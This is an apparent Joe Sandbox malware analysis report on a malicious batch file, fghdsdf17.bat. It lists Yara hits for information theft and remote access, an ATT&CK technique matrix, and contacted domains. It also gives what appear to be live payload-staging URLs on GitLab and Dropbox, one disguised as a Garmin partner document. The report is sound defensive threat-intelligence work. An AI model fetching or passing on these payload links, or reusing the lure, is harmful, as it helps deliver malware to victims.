Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation

Stealing of Sensitive Information

Source: Yara match, File source: amsi64_5512.amsi.csv, type: OTHER
Source: Yara match, File source: amsi64_2828.amsi.csv, type: OTHER
Source: Yara match, File source: Process Memory Space: powershell.exe PID: 5512, type: MEMORYSTR

Remote Access Functionality

Source: Yara match, File source: amsi64_5512.amsi.csv, type: OTHER
Source: Yara match, File source: amsi64_2828.amsi.csv, type: OTHER
Source: Yara match, File source: Process Memory Space: powershell.exe PID: 5512, type: MEMORYSTR
MITRE ATT&CK matrix, rebuilt by tactic column (the export had flattened the 14 columns into run-together rows); the number the report shows next to a technique is kept in parentheses:

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Scripting (11); Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Command and Scripting Interpreter (1); PowerShell (1); At; Cron; Launchd; Scheduled Task
Persistence: Scripting (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (21); Process Injection (11); Obfuscated Files or Information (1); DLL Side-Loading (1); Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (11); Process Discovery (1); Virtualization/Sandbox Evasion (21); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (11)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (3); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label | Link
fghdsdf17.bat | 5% | ReversingLabs | |
No Antivirus matches

Source | Detection | Scanner | Label | Link
https://uca83ad3860e00ba9c5292268edd.dl.dropboxusercontent.com | 0% | Avira URL Cloud | safe |
http://uca83ad3860e00ba9c5292268edd.dl.dropboxusercontent.com | 0% | Avira URL Cloud | safe |
https://uca83ad3860e00ba9c5292268edd.dl.dropboxusercontent.com/cd/0/get/Cgi0y-YI8TenZYJubto-r9s_MQQd | 0% | Avira URL Cloud | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
edge-block-www-env.dropbox-dns.com | 162.125.69.15 | true | false | | high
gitlab.com | 172.65.251.78 | true | false | | high
www-env.dropbox-dns.com | 162.125.69.18 | true | false | | high
uca83ad3860e00ba9c5292268edd.dl.dropboxusercontent.com | unknown | unknown | false | | unknown
www.dropbox.com | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip | false | | high
https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1 | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://gitlab.com | powershell.exe, 0000000E.00000002.1584428217.000002C501660000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.dropbox.com/service_worker.js | powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://gitlab.com/-/sandbox/; | powershell.exe, 0000000E.00000002.1584428217.000002C501645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://gitlab.com/users/sign_in | powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://paper.dropbox.com/ | powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://uca83ad3860e00ba9c5292268edd.dl.dropboxusercontent.com/cd/0/get/Cgi0y-YI8TenZYJubto-r9s_MQQd | powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.microsoft | powershell.exe, 0000000C.00000002.1528813287.0000020CF64A2000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/garmin_campaign_information_for_partners_v10.do | powershell.exe, 0000000C.00000002.1528756841.0000020CF6390000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.hellofax.com/ | powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://pal-test.adyen.com | powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.dropbox.com | powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://paper.dropbox.com/cloud-docs/edit | powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.do | powershell.exe, 0000000C.00000002.1496282413.0000020CDC340000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496607984.0000020CDC530000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000010.00000002.1799618095.000001A321D5E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://snowplow.trx.gitlab.net | powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                                            https://app.hellosign.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://collector.prd-278964.gl-product-analytics.compowershell.exe, 0000000E.00000002.1584428217.000002C501645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.hellosign.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://instructorledlearning.dropboxbusiness.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.dropbox.com/page_success/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://gitlab.compowershell.exe, 0000000E.00000002.1584428217.000002C500C33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501620000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.dropbox.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://gitlab.com/garvdsf/dsfg/-/raw/main/fga1712.zippowershell.exe, 0000000E.00000002.1662213672.000002C5700E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.dropbox.com/pithos/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://sales.dropboxbusiness.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://photos.dropbox.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://a.sprig.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.docsend.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://uca83ad3860e00ba9c5292268edd.dl.dropboxusercontent.compowershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://www.dropbox.com/encrypted_folder_download/service_worker.jspowershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://gitlab.com/assets/powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_envpowershell.exe, 0000000E.00000002.1584428217.000002C501645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://navi.dropbox.jp/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://contoso.com/powershell.exe, 00000010.00000002.1799618095.000001A321D5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.1525054616.0000020CEE22E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1525054616.0000020CEE371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDFBAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1650704145.000002C5101B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C5019CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1650704145.000002C51006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1693069885.000001A31367F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1799618095.000001A321EA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1799618095.000001A321D5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.dropbox.com/static/api/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://edge-block-www-env.dropbox-dns.compowershell.exe, 0000000C.00000002.1496759900.0000020CDF82E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.dropboxstatic.com/static/powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://apis.google.compowershell.exe, 0000000E.00000002.1584428217.000002C501645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://officeapps-df.live.compowershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://api.login.yahoo.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.1496759900.0000020CDE1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1693069885.000001A311CF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://sentry.gitlab.netpowershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://login.yahoo.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://docsend.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://www.dropbox.com/playlist/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://www.recaptcha.net/powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://onedrive.live.com/pickerpowershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://gitlab.com(powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.1525054616.0000020CEE22E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1525054616.0000020CEE371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDFBAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1650704145.000002C5101B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C5019CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1650704145.000002C51006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1693069885.000001A31367F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1799618095.000001A321EA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1799618095.000001A321D5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://showcase.dropbox.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://www.dropbox.com/static/serviceworker/powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://www.dropbox.compowershell.exe, 0000000C.00000002.1496759900.0000020CDF7E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF340000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000002.1693069885.000001A311F23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000002.1693069885.000001A311F23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://microsoft.copowershell.exe, 0000000E.00000002.1662345043.000002C5701FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://go.micropowershell.exe, 0000000C.00000002.1496759900.0000020CDF340000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C500C33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1693069885.000001A312E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://new-sentry.gitlab.netpowershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://contoso.com/Iconpowershell.exe, 00000010.00000002.1799618095.000001A321D5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.dropbox.com/v/s/playlist/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://www-env.dropbox-dns.compowershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000010.00000002.1693069885.000001A311F23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://docs.sandbox.google.com/document/fsip/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://docs.sandbox.google.com/spreadsheets/fsip/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://docs.google.com/document/fsip/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://help.dropbox.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://docs.google.com/presentation/fsip/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://canny.io/sdk.jspowershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
IP | Domain | Country | ASN | ASN Name | Malicious
172.65.251.78 | gitlab.com | United States | 13335 | CLOUDFLARENETUS | false
162.125.69.18 | www-env.dropbox-dns.com | United States | 19679 | DROPBOXUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578278
Start date and time: 2024-12-19 14:19:17 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 29s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: fghdsdf17.bat
Detection: MAL
Classification: mal88.troj.evad.winBAT@30/16@3/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 14
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .bat
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 3324 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 4808 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 5512 because it is empty
• Not all processes were analyzed, report is missing behavior information
• VT rate limit hit for: fghdsdf17.bat
Time | Type | Description
08:20:18 | API Interceptor | 67x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.65.251.78 | build_setup.exe | malicious | Vidar | gitlab.com/greg201/ppi3/-/raw/main/Setup.exe?inline=false
162.125.69.18 | hnghksdjfhs19De.bat | malicious | Abobus Obfuscator, Braodo |
162.125.69.18 | jhsdgfjkh236.bat | malicious | Abobus Obfuscator, Braodo |
162.125.69.18 | kjhsdgGarmin17.bat | malicious | Abobus Obfuscator, Braodo |
162.125.69.18 | hngadsfkgj17.bat | malicious | Abobus Obfuscator, Braodo |
162.125.69.18 | hsfgdf17.bat | malicious | Abobus Obfuscator, Braodo |
162.125.69.18 | gar17lksgf.bat | malicious | Abobus Obfuscator, Braodo |
162.125.69.18 | QhR8Zp6fZs.lnk | malicious | RHADAMANTHYS |
162.125.69.18 | CNUXJvLcgw.lnk | malicious | RHADAMANTHYS |
162.125.69.18 | xWpAZpLw47.lnk | malicious | RHADAMANTHYS |
162.125.69.18 | RFQ Letter and Instructions.pdf | malicious | Unknown |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
gitlab.com | hnghksdjfhs19De.bat | malicious | Abobus Obfuscator, Braodo | 172.65.251.78
gitlab.com | jhsdgfjkh236.bat | malicious | Abobus Obfuscator, Braodo | 172.65.251.78
gitlab.com | kjhsdgGarmin17.bat | malicious | Abobus Obfuscator, Braodo | 172.65.251.78
gitlab.com | hngadsfkgj17.bat | malicious | Abobus Obfuscator, Braodo | 172.65.251.78
